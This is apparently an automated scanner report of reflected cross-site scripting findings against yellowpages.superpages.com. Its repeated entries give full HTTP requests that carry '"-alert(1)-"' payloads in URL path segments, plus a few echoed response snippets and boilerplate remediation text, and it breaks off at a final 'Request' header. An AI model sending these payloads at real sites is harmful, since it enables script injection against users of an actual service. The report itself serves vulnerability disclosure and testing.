The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b0de"-alert(1)-"6b9a7c855f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common1b0de"-alert(1)-"6b9a7c855f1/js/jquery-1.4.2.min.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3160"-alert(1)-"4829f2347d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsa3160"-alert(1)-"4829f2347d1/jquery-1.4.2.min.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c15bc"-alert(1)-"c07082ab282 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery-1.4.2.min.jsc15bc"-alert(1)-"c07082ab282 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e16f"-alert(1)-"33e5c425b74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common9e16f"-alert(1)-"33e5c425b74/js/jquery-plugins.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed915"-alert(1)-"0cad65087d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsed915"-alert(1)-"0cad65087d6/jquery-plugins.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83d30"-alert(1)-"8c4dc2f6f41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery-plugins.js83d30"-alert(1)-"8c4dc2f6f41 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da908"-alert(1)-"11ea55c2deb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonda908"-alert(1)-"11ea55c2deb/js/jquery.history_remote.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
...[SNIP]... erv = 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/commonda908"-alert(1)-"11ea55c2deb/js/jquery.history_remote.js?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd0eb"-alert(1)-"1b21d8d7ca1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsfd0eb"-alert(1)-"1b21d8d7ca1/jquery.history_remote.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
...[SNIP]... = 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/common/jsfd0eb"-alert(1)-"1b21d8d7ca1/jquery.history_remote.js?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2aa9"-alert(1)-"d4fdd1017fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery.history_remote.jsa2aa9"-alert(1)-"d4fdd1017fc HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
var actualUrl = "http://yellowpages.superpages.com/common/js/jquery.history_remote.jsa2aa9"-alert(1)-"d4fdd1017fc?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 423a3"-alert(1)-"68dc8dd0c20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common423a3"-alert(1)-"68dc8dd0c20/js/jquery.spac.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99526"-alert(1)-"083e7c5c357 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js99526"-alert(1)-"083e7c5c357/jquery.spac.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 403d2"-alert(1)-"61fb49790b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery.spac.js403d2"-alert(1)-"61fb49790b4 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e9bf"-alert(1)-"d6c846fad96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common9e9bf"-alert(1)-"d6c846fad96/js/jquery.sptabs.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c4cc"-alert(1)-"510096b9b12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js9c4cc"-alert(1)-"510096b9b12/jquery.sptabs.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55146"-alert(1)-"b4dae08e2a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery.sptabs.js55146"-alert(1)-"b4dae08e2a6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90255"-alert(1)-"d59370ac4e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common90255"-alert(1)-"d59370ac4e6/js/omniture_onclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86f5f"-alert(1)-"e08a57a36ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js86f5f"-alert(1)-"e08a57a36ea/omniture_onclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efb41"-alert(1)-"444d324d844 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/omniture_onclick.jsefb41"-alert(1)-"444d324d844 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79c04"-alert(1)-"705d250d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common79c04"-alert(1)-"705d250d4/js/recently_viewed.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99503"-alert(1)-"e25a2d721e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js99503"-alert(1)-"e25a2d721e/recently_viewed.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fa5a"-alert(1)-"1f4b9f57f59 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/recently_viewed.js3fa5a"-alert(1)-"1f4b9f57f59 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98f51"-alert(1)-"a71dfc81f1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common98f51"-alert(1)-"a71dfc81f1e/js/s_code.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4ed6"-alert(1)-"27de61fbe10 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsb4ed6"-alert(1)-"27de61fbe10/s_code.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7749b"-alert(1)-"166f9789793 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/s_code.js7749b"-alert(1)-"166f9789793 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f314a"-alert(1)-"d718b79fe66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonf314a"-alert(1)-"d718b79fe66/js/sendtom.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be851"-alert(1)-"c609dcd305c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsbe851"-alert(1)-"c609dcd305c/sendtom.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9282"-alert(1)-"39f1a17bdb6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/sendtom.jsb9282"-alert(1)-"39f1a17bdb6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9a27"-alert(1)-"97869801f49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond9a27"-alert(1)-"97869801f49/js/spflyouts.1.0.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5868"-alert(1)-"87bdb7fff34 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
